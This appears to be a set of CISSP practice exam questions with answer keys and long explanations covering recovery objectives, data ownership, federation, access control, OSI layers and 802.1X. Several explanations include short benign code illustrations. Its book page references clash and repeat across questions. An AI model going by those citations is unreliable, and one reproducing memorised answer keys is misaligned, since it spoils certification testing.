The best description of Recovery Time Objective (RTO) is the time of application resumption after disaster. RTO is a metric that defines the maximum acceptable time that an application or a system can be unavailable or offline after a disaster or a disruption. RTO is based on the business impact analysis and the recovery requirements of the organization, and it helps to determine the recovery strategies and the resources needed to restore the application or the system to its normal operation. Time of data validation after disaster, time of data restoration from backup after disaster, and time of application verification after disaster are not the best descriptions of RTO, as they are related to the quality, accuracy, or completeness of the data or the application, not the availability or the downtime of the application or the system. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, Security Operations, page 899. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7, Security Operations, page 915.
Refer to the information below to answer the question.
A new employee is given a laptop computer with full administrator access. This employee does not have a personal computer at home and has a child that uses the computer to send and receive e-mail, search the web, and use instant messaging. The organization’s Information Technology (IT) department discovers that a peer-to-peer program has been installed on the computer using the employee's access.
Which of the following methods is the MOST effective way of removing the Peer-to-Peer (P2P) program from the computer?
Run software uninstall
Re-image the computer
Find and remove all installation files
Delete all cookies stored in the web browser cache
The most effective way of removing the P2P program from the computer is to re-image the computer. Re-imaging the computer means to restore the computer to its original or desired state, by erasing or overwriting the existing data or software on the computer, and by installing a new or a backup image of the operating system and the applications on the computer. Re-imaging the computer can ensure that the P2P program and any other unwanted or harmful programs or files are completely removed from the computer, and that the computer is clean and secure. Run software uninstall, find and remove all installation files, and delete all cookies stored in the web browser cache are not the most effective ways of removing the P2P program from the computer, as they may not remove all the traces or components of the P2P program from the computer, or they may not address the other potential issues or risks that the P2P program may have caused on the computer. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, Security Operations, page 906. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7, Security Operations, page 922.
Refer to the information below to answer the question.
An organization experiencing a negative financial impact is forced to reduce budgets and the number of Information Technology (IT) operations staff performing basic logical access security administration functions. Security processes have been tightly integrated into normal IT operations and are not separate and distinct roles.
Which of the following will indicate where the IT budget is BEST allocated during this time?
Policies
Frameworks
Metrics
Guidelines
The best indicator of where the IT budget is best allocated during this time is the metrics. The metrics are the measurements or the indicators of the performance, the effectiveness, the efficiency, or the quality of the IT processes, activities, or outcomes. The metrics can help to allocate the IT budget in a rational, objective, and evidence-based manner, as they can show the value, the impact, or the return of the IT investments, and they can identify the gaps, the risks, or the opportunities for the IT improvement or enhancement. The metrics can also help to justify, communicate, or report the IT budget allocation to the senior management or the stakeholders, and to align the IT budget allocation with the business needs and requirements. Policies, frameworks, and guidelines are not the best indicators of where the IT budget is best allocated during this time, as they are related to the documents or the models that define, guide, or standardize the IT processes, activities, or outcomes, not the measurements or the indicators of the IT performance, effectiveness, efficiency, or quality. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, Security and Risk Management, page 38. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 1, Security and Risk Management, page 53.
An online retail company has formulated a record retention schedule for customer transactions. Which of the following is a valid reason a customer transaction is kept beyond the retention schedule?
Pending legal hold
Long term data mining needs
Customer makes request to retain
Useful for future business initiatives
A valid reason for keeping a customer transaction beyond the retention schedule is a pending legal hold. A legal hold is a requirement or an order to preserve certain records or data that are relevant or potentially relevant to a legal matter, such as a lawsuit, an investigation, or an audit. A legal hold can override the normal record retention schedule or policy of an organization, and can mandate the organization to retain the records or data until the legal matter is resolved or the legal hold is lifted. A pending legal hold can be a valid reason for keeping a customer transaction beyond the retention schedule, as it can ensure the compliance, evidence, or liability of the organization or the customer. Long term data mining needs, customer makes request to retain, and useful for future business initiatives are not valid reasons for keeping a customer transaction beyond the retention schedule, as they are related to the business value, preference, or strategy of the organization or the customer, not the legal obligation or necessity of the organization or the customer. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, Security and Risk Management, page 49. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 1, Security and Risk Management, page 64.
Refer to the information below to answer the question.
A new employee is given a laptop computer with full administrator access. This employee does not have a personal computer at home and has a child that uses the computer to send and receive e-mail, search the web, and use instant messaging. The organization’s Information Technology (IT) department discovers that a peer-to-peer program has been installed on the computer using the employee's access.
Which of the following could have MOST likely prevented the Peer-to-Peer (P2P) program from being installed on the computer?
Removing employee's full access to the computer
Supervising their child's use of the computer
Limiting computer's access to only the employee
Ensuring employee understands their business conduct guidelines
The best way to prevent the P2P program from being installed on the computer is to remove the employee’s full access to the computer. Full access or administrator access means that the user has the highest level of privilege or permission to perform any action or operation on the computer, such as installing, modifying, or deleting any software or file. By removing the employee’s full access to the computer, and assigning them a lower level of access, such as user or guest, the organization can restrict the employee’s ability to install unauthorized or potentially harmful programs, such as P2P programs, on the computer. Supervising their child’s use of the computer, limiting computer’s access to only the employee, and ensuring employee understands their business conduct guidelines are not the best ways to prevent the P2P program from being installed on the computer, as they are related to the monitoring, control, or awareness of the computer usage, not the restriction or limitation of the computer access. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, Identity and Access Management, page 660. Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, Identity and Access Management, page 676.
What is the BEST first step for determining if the appropriate security controls are in place for protecting data at rest?
Identify regulatory requirements
Conduct a risk assessment
Determine business drivers
Review the security baseline configuration
A risk assessment is the best first step for determining if the appropriate security controls are in place for protecting data at rest. A risk assessment involves identifying the assets, threats, vulnerabilities, and impacts related to the data, as well as the likelihood and severity of potential breaches. Based on the risk assessment, the appropriate security controls can be selected and implemented to mitigate the risks to an acceptable level. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, p. 35; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 1: Security and Risk Management, p. 41.
Users require access rights that allow them to view the average salary of groups of employees. Which control would prevent the users from obtaining an individual employee’s salary?
Limit access to predefined queries
Segregate the database into a small number of partitions each with a separate security level
Implement Role Based Access Control (RBAC)
Reduce the number of people who have access to the system for statistical purposes
Limiting access to predefined queries is the control that would prevent the users from obtaining an individual employee’s salary, if they only require access rights that allow them to view the average salary of groups of employees. A query is a request for information from a database, which can be expressed in a structured query language (SQL) or a graphical user interface (GUI). A query can specify the criteria, conditions, and operations for selecting, filtering, sorting, grouping, and aggregating the data from the database. A predefined query is a query that has been created and stored in advance by the database administrator or the data owner, and that can be executed by the authorized users without any modification. A predefined query can provide several benefits, such as consistency and accuracy of the results, prevention of ad hoc or malicious queries, and enforcement of least privilege on the data that users can retrieve.
Limiting access to predefined queries is the control that would prevent the users from obtaining an individual employee’s salary, if they only require access rights that allow them to view the average salary of groups of employees, because it can ensure that the users can only access the data that is relevant and necessary for their tasks, and that they cannot access or manipulate the data that is beyond their scope or authority. For example, a predefined query can be created and stored that calculates and displays the average salary of groups of employees based on certain criteria, such as department, position, or experience. The users who need to view this information can execute this predefined query, but they cannot modify it or create their own queries that might reveal the individual employee’s salary or other sensitive data.
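A minimal sketch of this control in application code, assuming a JDBC data source and illustrative table and column names (employees, department, salary): the application exposes only the fixed aggregate statement, so users can never select an individual row.

```java
// Hypothetical sketch of the "predefined query" control: users can run
// only this fixed aggregate statement, never an ad hoc SELECT, so group
// averages are visible but individual salaries are not. The JDBC URL and
// schema names are illustrative.
import java.sql.*;

public class AverageSalaryReport {
    private static final String PREDEFINED_QUERY =
            "SELECT department, AVG(salary) AS avg_salary " +
            "FROM employees GROUP BY department HAVING COUNT(*) >= 5";
            // HAVING guards small groups, where an "average" would
            // effectively disclose an individual's salary.

    public static void main(String[] args) throws SQLException {
        try (Connection conn = DriverManager.getConnection("jdbc:example:hr");
             PreparedStatement stmt = conn.prepareStatement(PREDEFINED_QUERY);
             ResultSet rs = stmt.executeQuery()) {
            while (rs.next()) {
                System.out.printf("%s: %.2f%n",
                        rs.getString("department"), rs.getDouble("avg_salary"));
            }
        }
    }
}
```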
The other options are not the controls that would prevent the users from obtaining an individual employee’s salary, if they only require access rights that allow them to view the average salary of groups of employees, but rather controls that have other purposes or effects. Segregating the database into a small number of partitions each with a separate security level is a control that would improve the performance and security of the database by dividing it into smaller and manageable segments that can be accessed and processed independently and concurrently. However, this control would not prevent the users from obtaining an individual employee’s salary, if they have access to the partition that contains the salary data, and if they can create or modify their own queries. Implementing Role Based Access Control (RBAC) is a control that would enforce the access rights and permissions of the users based on their roles or functions within the organization, rather than their identities or attributes. However, this control would not prevent the users from obtaining an individual employee’s salary, if their roles or functions require them to access the salary data, and if they can create or modify their own queries. Reducing the number of people who have access to the system for statistical purposes is a control that would reduce the risk and impact of unauthorized access or disclosure of the sensitive data by minimizing the exposure and distribution of the data. However, this control would not prevent the users from obtaining an individual employee’s salary, if they are among the people who have access to the system, and if they can create or modify their own queries.
A manufacturing organization wants to establish a Federated Identity Management (FIM) system with its 20 different supplier companies. Which of the following is the BEST solution for the manufacturing organization?
Trusted third-party certification
Lightweight Directory Access Protocol (LDAP)
Security Assertion Markup language (SAML)
Cross-certification
Security Assertion Markup Language (SAML) is the best solution for the manufacturing organization that wants to establish a Federated Identity Management (FIM) system with its 20 different supplier companies. FIM is a process that allows the sharing and recognition of identities across different organizations that have a trust relationship. FIM enables the users of one organization to access the resources or services of another organization without having to create or maintain multiple accounts or credentials. FIM can provide several benefits, such as single sign-on convenience for the users, fewer credentials to create and manage, and reduced administrative overhead and risk for the participating organizations.
SAML is a standard protocol that supports FIM by allowing the exchange of authentication and authorization information between different parties. SAML uses XML-based messages, called assertions, to convey the identity, attributes, and entitlements of a user to a service provider. SAML defines three roles for the parties involved in FIM: the principal (the user who requests access), the identity provider (IdP), which authenticates the user and issues the assertions, and the service provider (SP), which consumes the assertions and grants or denies access to its resources.
SAML works as follows: the user requests a resource from the service provider; the service provider redirects the user to the identity provider with an authentication request; the identity provider authenticates the user and returns a digitally signed assertion; and the service provider validates the assertion and, if it is trusted and valid, grants the user access to the resource.
SAML is the best solution for the manufacturing organization that wants to establish a FIM system with its 20 different supplier companies, because it can enable the seamless and secure access to the resources or services across the different organizations, without requiring the users to create or maintain multiple accounts or credentials. SAML can also provide interoperability and compatibility between different platforms and technologies, as it is based on a standard and open protocol.
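For a feel of what the service provider consumes, the sketch below parses a minimal, unsigned SAML 2.0 assertion and extracts the issuer and subject. The issuer and subject values are illustrative, and a real service provider would use a library such as OpenSAML and must verify the assertion's digital signature before trusting it:

```java
// Hypothetical sketch of the shape of a SAML 2.0 assertion: a signed XML
// document whose <Subject> carries the federated identity. This sketch
// only parses the structure; it performs no signature verification.
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

public class SamlSubjectReader {
    static final String SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion";

    public static void main(String[] args) throws Exception {
        String assertion =
            "<saml:Assertion xmlns:saml='" + SAML_NS + "'>" +
            "  <saml:Issuer>https://idp.manufacturer.example</saml:Issuer>" +
            "  <saml:Subject><saml:NameID>alice@supplier07.example</saml:NameID></saml:Subject>" +
            "</saml:Assertion>";
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        Document doc = dbf.newDocumentBuilder()
                .parse(new ByteArrayInputStream(assertion.getBytes(StandardCharsets.UTF_8)));
        String issuer = doc.getElementsByTagNameNS(SAML_NS, "Issuer").item(0).getTextContent();
        String nameId = doc.getElementsByTagNameNS(SAML_NS, "NameID").item(0).getTextContent();
        System.out.println("Issuer: " + issuer + ", Subject: " + nameId);
    }
}
```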
The other options are not the best solutions for the manufacturing organization that wants to establish a FIM system with its 20 different supplier companies, but rather solutions that have other limitations or drawbacks. Trusted third-party certification is a process that involves a third party, such as a certificate authority (CA), that issues and verifies digital certificates that contain the public key and identity information of a user or an entity. Trusted third-party certification can provide authentication and encryption for the communication between different parties, but it does not provide authorization or entitlement information for the access to the resources or services. Lightweight Directory Access Protocol (LDAP) is a protocol that allows the access and management of directory services, such as Active Directory, that store the identity and attribute information of users and entities. LDAP can provide a centralized and standardized way to store and retrieve identity and attribute information, but it does not provide a mechanism to exchange or federate the information across different organizations. Cross-certification is a process that involves two or more CAs that establish a trust relationship and recognize each other’s certificates. Cross-certification can extend the trust and validity of the certificates across different domains or organizations, but it does not provide a mechanism to exchange or federate the identity, attribute, or entitlement information.
Which of the following BEST describes an access control method utilizing cryptographic keys derived from a smart card private key that is embedded within mobile devices?
Derived credential
Temporary security credential
Mobile device credentialing service
Digest authentication
Derived credential is the best description of an access control method utilizing cryptographic keys derived from a smart card private key that is embedded within mobile devices. A smart card is a device that contains a microchip that stores a private key and a digital certificate that are used for authentication and encryption. A smart card is typically inserted into a reader that is attached to a computer or a terminal, and the user enters a personal identification number (PIN) to unlock the smart card and access the private key and the certificate. A smart card can provide a high level of security and convenience for the user, as it implements a two-factor authentication method that combines something the user has (the smart card) and something the user knows (the PIN).
However, a smart card may not be compatible or convenient for mobile devices, such as smartphones or tablets, that do not have a smart card reader or a USB port. To address this issue, a derived credential is a solution that allows the user to use a mobile device as an alternative to a smart card for authentication and encryption. A derived credential is a cryptographic key and a certificate that are derived from the smart card private key and certificate, and that are stored on the mobile device. A derived credential works as follows: the user first authenticates with the smart card and its PIN to prove possession of the original credential; a derived key and certificate, based on the smart card credential and bound to the same identity, are then generated and provisioned to the mobile device; they are stored in the device’s secure keystore; and the user unlocks them with a PIN or a biometric feature to authenticate and encrypt from the mobile device.
A derived credential can provide a secure and convenient way to use a mobile device as an alternative to a smart card for authentication and encryption, as it implements a two-factor authentication method that combines something the user has (the mobile device) and something the user is (the biometric feature). A derived credential can also comply with the standards and policies for the use of smart cards, such as the Personal Identity Verification (PIV) or the Common Access Card (CAC) programs.
The other options are not the best descriptions of an access control method utilizing cryptographic keys derived from a smart card private key that is embedded within mobile devices, but rather descriptions of other methods or concepts. Temporary security credential is a method that involves issuing a short-lived credential, such as a token or a password, that can be used for a limited time or a specific purpose. Temporary security credential can provide a flexible and dynamic way to grant access to the users or entities, but it does not involve deriving a cryptographic key from a smart card private key. Mobile device credentialing service is a concept that involves providing a service that can issue, manage, or revoke credentials for mobile devices, such as certificates, tokens, or passwords. Mobile device credentialing service can provide a centralized and standardized way to control the access of mobile devices, but it does not involve deriving a cryptographic key from a smart card private key. Digest authentication is a method that involves using a hash function, such as MD5, to generate a digest or a fingerprint of the user’s credentials, such as the username and password, and sending it to the server for verification. Digest authentication can provide a more secure way to authenticate the user than the basic authentication, which sends the credentials in plain text, but it does not involve deriving a cryptographic key from a smart card private key.
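To make the contrast with digest authentication concrete, the sketch below computes an RFC 2617 digest response (without the optional qop extension) using the standard MessageDigest API; the username, realm, password, nonce, and URI are illustrative:

```java
// Minimal sketch of the HTTP Digest Authentication response computation
// (RFC 2617): the server never receives the password, only an MD5 digest.
import java.security.MessageDigest;
import java.nio.charset.StandardCharsets;

public class DigestAuthDemo {
    static String md5Hex(String s) throws Exception {
        byte[] d = MessageDigest.getInstance("MD5").digest(s.getBytes(StandardCharsets.UTF_8));
        StringBuilder sb = new StringBuilder();
        for (byte b : d) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        String ha1 = md5Hex("alice:example-realm:s3cret");    // MD5(user:realm:password)
        String ha2 = md5Hex("GET:/protected/report");         // MD5(method:digest-URI)
        String response = md5Hex(ha1 + ":abc123nonce:" + ha2); // MD5(HA1:nonce:HA2)
        System.out.println("Digest response: " + response);
    }
}
```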
What is the BEST approach for controlling access to highly sensitive information when employees have the same level of security clearance?
Audit logs
Role-Based Access Control (RBAC)
Two-factor authentication
Application of least privilege
Applying the principle of least privilege is the best approach for controlling access to highly sensitive information when employees have the same level of security clearance. The principle of least privilege is a security concept that states that every user or process should have the minimum amount of access rights and permissions that are necessary to perform their tasks or functions, and nothing more. The principle of least privilege can provide several benefits, such as a reduced attack surface, limited damage and exposure if an account or process is compromised, and simpler auditing and accountability.
Applying the principle of least privilege is the best approach for controlling access to highly sensitive information when employees have the same level of security clearance, because it can ensure that the employees can only access the information that is relevant and necessary for their tasks or functions, and that they cannot access or manipulate the information that is beyond their scope or authority. For example, if the highly sensitive information is related to a specific project or department, then only the employees who are involved in that project or department should have access to that information, and not the employees who have the same level of security clearance but are not involved in that project or department.
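A small sketch of the principle applied at the file level, using the standard java.nio POSIX attribute API (POSIX file systems only; the file is illustrative): the sensitive file is granted the single permission its owner actually needs, read, and nothing else.

```java
// Hypothetical sketch of least privilege on a sensitive file: only the
// owner may read it; no one may write or execute.
import java.nio.file.*;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.Set;

public class LeastPrivilegeFile {
    public static void main(String[] args) throws Exception {
        Path sensitive = Files.createTempFile("project-roster", ".txt");
        // "r--------": owner read only -- the minimum needed to view the data.
        Set<PosixFilePermission> ownerReadOnly = PosixFilePermissions.fromString("r--------");
        Files.setPosixFilePermissions(sensitive, ownerReadOnly);
        System.out.println("Permissions: "
                + PosixFilePermissions.toString(Files.getPosixFilePermissions(sensitive)));
    }
}
```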
The other options are not the best approaches for controlling access to highly sensitive information when employees have the same level of security clearance, but rather approaches that have other purposes or effects. Audit logs are records that capture and store the information about the events and activities that occur within a system or a network, such as the access and usage of the sensitive data. Audit logs can provide a reactive and detective layer of security by enabling the monitoring and analysis of the system or network behavior, and facilitating the investigation and response of the incidents. However, audit logs cannot prevent or reduce the access or disclosure of the sensitive information, but rather provide evidence or clues after the fact. Role-Based Access Control (RBAC) is a method that enforces the access rights and permissions of the users based on their roles or functions within the organization, rather than their identities or attributes. RBAC can provide a granular and dynamic layer of security by defining and assigning the roles and permissions according to the organizational structure and policies. However, RBAC cannot control the access to highly sensitive information when employees have the same level of security clearance and the same role or function within the organization, but rather rely on other criteria or mechanisms. Two-factor authentication is a technique that verifies the identity of the users by requiring them to provide two pieces of evidence or factors, such as something they know (e.g., password, PIN), something they have (e.g., token, smart card), or something they are (e.g., fingerprint, face). Two-factor authentication can provide a strong and preventive layer of security by preventing unauthorized access to the system or network by the users who do not have both factors. However, two-factor authentication cannot control the access to highly sensitive information when employees have the same level of security clearance and the same two factors, but rather rely on other criteria or mechanisms.
After acquiring the latest security updates, what must be done before deploying to production systems?
Use tools to detect missing system patches
Install the patches on a test system
Subscribe to notifications for vulnerabilities
Assess the severity of the situation
After acquiring the latest security updates, the best practice is to install the patches on a test system before deploying them to the production systems. This is to ensure that the patches are compatible with the system configuration and do not cause any adverse effects or conflicts with the existing applications or services. The test system should be isolated from the production environment and should have the same or similar specifications and settings as the production system.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6, page 336; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 6, page 297
Which of the following is the PRIMARY reason for employing physical security personnel at entry points in facilities where card access is in operation?
To verify that only employees have access to the facility.
To identify present hazards requiring remediation.
To monitor staff movement throughout the facility.
To provide a safe environment for employees.
According to the CISSP CBK Official Study Guide, the primary reason for employing physical security personnel at entry points in facilities where card access is in operation is to provide a safe environment for employees. Physical security personnel are the human element of the physical security system, supplementing controls such as locks, doors, badges, and card readers. They guard, patrol, and monitor the premises, and verify, identify, and authenticate the people who enter. Stationing them at entry points adds a layer of protection, and a human factor, that card readers alone cannot provide: personnel can respond to tailgating, coercion, stolen or cloned cards, and other situations that an automated system cannot judge. Providing a safe environment protects the well-being and productivity of employees by reducing threats such as theft, vandalism, and violence.
Verifying that only employees have access to the facility is not the primary reason, although it is a benefit of posting security personnel: guards can confirm that the people entering are authorized, using the card access system, biometrics, or visual identification, which helps prevent unauthorized entry. It is a supporting function rather than the main objective. Identifying present hazards requiring remediation is likewise not the primary reason, although personnel on patrol may detect hazards such as fire, flood, or structural dangers and initiate the actions needed to resolve them; this contributes to safety but is not the main purpose of staffing entry points.
Monitoring staff movement throughout the facility is also not the primary reason, although personnel may observe and track the entry, exit, and location of staff, which supports the security of the facility and can deter misuse or abuse; again, it is a consequence of their presence rather than the principal objective of employing physical security personnel at entry points.
Between which pair of Open System Interconnection (OSI) Reference Model layers are routers used as a communications device?
Transport and Session
Data-Link and Transport
Network and Session
Physical and Data-Link
Routers operate at the Network layer (Layer 3) of the Open System Interconnection (OSI) Reference Model. Because the Network layer sits between the Data-Link layer (Layer 2) and the Transport layer (Layer 4), routers are used as a communications device between the Data-Link and Transport layers. The OSI Reference Model is a conceptual framework that divides the functions of a communication system into seven layers: Physical, Data-Link, Network, Transport, Session, Presentation, and Application.
At the Network layer, routers perform logical addressing, path selection, and packet forwarding between networks: they accept frames from the Data-Link layer below, make forwarding decisions on the Layer 3 packets inside them, and pass data upward toward the Transport layer only at the communicating end hosts.
Transport and Session is incorrect because routers do not operate at either of those layers; end-to-end delivery over segments, ports, and protocols such as the Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) is handled by the hosts, not by routers. Network and Session is incorrect because those layers are not adjacent; the Transport layer lies between them, and routers neither establish nor manage sessions. Physical and Data-Link is incorrect because the devices operating at and between those layers are repeaters, hubs, bridges, and switches, which forward bits and frames based on Media Access Control (MAC) addresses and Ethernet protocols rather than routed packets. References: CISSP CBK Official Study Guide.
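The placement argument is easy to check against a layer map. Below is a small Python reference table; the device associations are the conventional textbook ones, included purely as an illustration.

```python
# Quick layer map for the argument above: routers sit at Layer 3, which is
# between the Data-Link (2) and Transport (4) layers. Device associations
# are the conventional textbook ones, shown for illustration only.
OSI_LAYERS = {
    1: ("Physical", "hubs, repeaters"),
    2: ("Data-Link", "switches, bridges"),
    3: ("Network", "routers"),
    4: ("Transport", "host TCP/UDP stacks"),
    5: ("Session", "host software"),
    6: ("Presentation", "host software"),
    7: ("Application", "gateways, proxies"),
}

name, devices = OSI_LAYERS[3]
print(f"{devices} operate at the {name} layer, "
      f"between {OSI_LAYERS[2][0]} and {OSI_LAYERS[4][0]}")
# -> routers operate at the Network layer, between Data-Link and Transport
```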
Which of the following roles has the obligation to ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization?
Data Custodian
Data Owner
Data Creator
Data User
The role obligated to ensure that a third-party provider can process and handle data securely, and meet the standards set by the organization, is the data owner. A data owner is the person or entity with authority and responsibility for data within an organization, and who determines its classification, usage, protection, and retention. The data owner carries this obligation because the owner remains ultimately accountable for the security and quality of the data regardless of who processes or handles it. A data owner can discharge the obligation by conducting due diligence, establishing service level agreements, defining security requirements, monitoring performance, and auditing compliance. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2, page 61; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 2, page 67
A company has decided that they need to begin maintaining assets deployed in the enterprise. What approach should be followed to determine and maintain ownership information to bring the company into compliance?
Enterprise asset management framework
Asset baseline using commercial off the shelf software
Asset ownership database using domain login records
A script to report active user logins on assets
According to the CISSP CBK Official Study Guide, the approach that should be followed to determine and maintain ownership information and bring the company into compliance is an enterprise asset management framework. Such a framework is a set of principles, processes, and practices for managing the assets deployed in the enterprise, such as hardware, software, data, and information. It supports security and integrity by enforcing policies, procedures, and standards governing the identification, classification, ownership, valuation, allocation, utilization, maintenance, protection, and disposal of assets, and it supports compliance by aligning asset handling with applicable legal, regulatory, contractual, and ethical obligations. Because the framework provides a systematic method for identifying and assigning owners or custodians and for recording ownership details such as an asset's name, description, location, status, and value, it establishes both the accountability and the accurate, complete, and consistent records that compliance requires, and it helps prevent the disputes and losses, such as theft or misuse, that arise when ownership is unclear.
An asset baseline using commercial off-the-shelf (COTS) software is not the right approach, although it may be a by-product of a framework. A baseline is a reference standard for measuring asset performance and quality using metrics such as availability, reliability, and efficiency, and COTS software provides a ready-made platform for collecting that data. Baselines help with monitoring and optimization, but they do not address the identification, documentation, and verification of asset owners, which is the essence of ownership information.
An asset ownership database built from domain login records is likewise not the right approach. Login records document who accessed the domain or network and when, and they can suggest who uses an asset, but they do not reliably establish ownership: they may omit assets that never appear in login activity and users who are not in the domain, producing gaps, errors, and inconsistencies in the ownership data.
A script that reports active user logins on assets is also not the right approach, although it can be a useful operational tool. A script (for example, a batch, shell, or PowerShell program) can quickly report which users are currently logged in to which assets, which helps with monitoring usage and status, but, like the other alternatives, it does not identify, document, or verify the owners or custodians of the assets.
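To make the ownership-record idea concrete, here is a minimal Python sketch of the kind of register such a framework maintains; the AssetRecord fields and the compliance check are illustrative assumptions, not a standard schema.

```python
from dataclasses import dataclass
from typing import Optional

# Minimal sketch of an ownership record; the AssetRecord fields and the
# compliance check are illustrative assumptions, not a standard schema.
@dataclass
class AssetRecord:
    asset_id: str
    name: str
    location: str
    status: str
    value: float
    owner: Optional[str] = None      # accountable business owner
    custodian: Optional[str] = None  # day-to-day caretaker

def compliance_gaps(register: list) -> list:
    """Flag assets whose ownership information is missing or incomplete."""
    return [a.asset_id for a in register if not a.owner or not a.custodian]

register = [
    AssetRecord("SRV-001", "HR database server", "DC-1", "active", 12000.0,
                owner="HR Director", custodian="DBA team"),
    AssetRecord("LAP-042", "Engineering laptop", "Remote", "active", 1500.0),
]
print(compliance_gaps(register))  # ['LAP-042'] -- no owner on record
```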
Which of the following entities is ultimately accountable for data remanence vulnerabilities with data replicated by a cloud service provider?
Data owner
Data steward
Data custodian
Data processor
The entity ultimately accountable for data remanence vulnerabilities in data replicated by a cloud service provider is the data owner. Data remanence is the residual data that remains on storage media after deletion, and when a cloud provider replicates data across systems and regions, copies may persist after the original is deleted. Although the provider acts as a data processor, and internal roles such as the data steward and data custodian handle the data day to day, accountability cannot be outsourced: the data owner remains ultimately accountable for the security of the data regardless of who processes or handles it. The owner addresses remanence risk through due diligence, service level agreements, defined security requirements (such as sanitization or cryptographic erasure of replicas), monitoring, and audits. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2, page 61; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 2, page 67
Which security approach will BEST minimize Personally Identifiable Information (PII) loss from a data breach?
A strong breach notification process
Limited collection of individuals' confidential data
End-to-end data encryption for data in transit
Continuous monitoring of potential vulnerabilities
The best security approach to minimize PII loss from a data breach is to limit the collection of individuals’ confidential data to the minimum necessary for the business purpose. This is based on the principle of data minimization, which is one of the core principles of privacy by design. By collecting less PII, the organization reduces the amount of data that could be exposed or compromised in a data breach, and thus lowers the potential impact and liability. The other options are not the best security approach, but rather complementary or reactive measures. A strong breach notification process is important to inform the affected individuals and authorities about the data breach, but it does not prevent or minimize the loss of PII. End-to-end data encryption for data in transit is a good practice to protect the confidentiality and integrity of data, but it does not address the data at rest or in use, and it may not prevent unauthorized access if the encryption keys are compromised. Continuous monitoring of potential vulnerabilities is a proactive measure to identify and remediate security weaknesses, but it does not eliminate the possibility of a data breach, and it does not reduce the amount of PII collected or stored. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, p. 114; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, p. 289; CISSP practice exam questions and answers, Question 6.
Which Radio Frequency Interference (RFI) phenomenon associated with bundled cable runs can create information leakage?
Transference
Covert channel
Bleeding
Cross-talk
Cross-talk is a type of Radio Frequency Interference (RFI) phenomenon that occurs when signals from one cable or circuit interfere with signals from another cable or circuit. Cross-talk can create information leakage by allowing an attacker to eavesdrop on or modify the transmitted data. Cross-talk can be caused by electromagnetic induction, capacitive coupling, or common impedance coupling. Cross-talk can be reduced by using shielded cables, twisted pairs, or optical fibers.
Disaster Recovery Plan (DRP) training material should be
consistent so that all audiences receive the same training.
stored in a fireproof safe to ensure availability when needed.
only delivered in paper format.
presented in a professional looking manner.
Disaster Recovery Plan (DRP) training material should be consistent so that all audiences receive the same training. A DRP is a document that outlines the procedures and actions to be taken in the event of a disaster that disrupts the normal operations of an organization, and DRP training material provides the instructions and guidance for staff and stakeholders to learn and practice the plan. The material should be consistent so that all audiences receive the same training regardless of their roles, responsibilities, or locations; this ensures that the DRP is understood, followed, and executed correctly and effectively by everyone involved. The other options are secondary or irrelevant factors rather than defining characteristics. Storing the training material in a fireproof safe is good practice but not a requirement, since it can also be kept in other secure and accessible locations, such as online or offsite. Delivering it only in paper format is a limitation, not a benefit, as electronic or audiovisual formats may better suit the audience. Presenting it in a professional-looking manner is a nice touch but not a priority, as a simple or informal presentation is acceptable so long as it is clear, concise, and accurate. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, p. 387; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7, p. 412.
Application of which of the following Institute of Electrical and Electronics Engineers (IEEE) standards will prevent an unauthorized wireless device from being attached to a network?
IEEE 802.1F
IEEE 802.1H
IEEE 802.1Q
IEEE 802.1X
IEEE 802.1X is a standard for port-based Network Access Control (PNAC). It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN, preventing unauthorized devices from gaining network access.
References: CISSP For Dummies, Seventh Edition, Chapter 4, page 97; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, page 247
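As a conceptual illustration of port-based access control, here is a Python sketch of the authorized/unauthorized port state that 802.1X defines; the class, the credential check, and the authentication-server stand-in are hypothetical simplifications, not a protocol implementation.

```python
from enum import Enum, auto

# Conceptual sketch of IEEE 802.1X port-based access control: a controlled
# port forwards nothing but authentication traffic until the authentication
# server accepts the supplicant's credentials. This is an illustration, not
# a protocol implementation; the RADIUS exchange is a stand-in callable.
class PortState(Enum):
    UNAUTHORIZED = auto()  # only EAPOL (authentication) frames pass
    AUTHORIZED = auto()    # normal traffic is forwarded

class ControlledPort:
    def __init__(self, authentication_server) -> None:
        self.state = PortState.UNAUTHORIZED
        self._auth = authentication_server

    def device_connects(self, credentials: dict) -> None:
        # The switch (authenticator) relays credentials to the server.
        if self._auth(credentials):
            self.state = PortState.AUTHORIZED
        else:
            self.state = PortState.UNAUTHORIZED  # rogue device stays blocked

    def forwards_traffic(self) -> bool:
        return self.state is PortState.AUTHORIZED

port = ControlledPort(lambda c: c == {"user": "alice", "pw": "s3cret"})
port.device_connects({"user": "rogue", "pw": "guess"})
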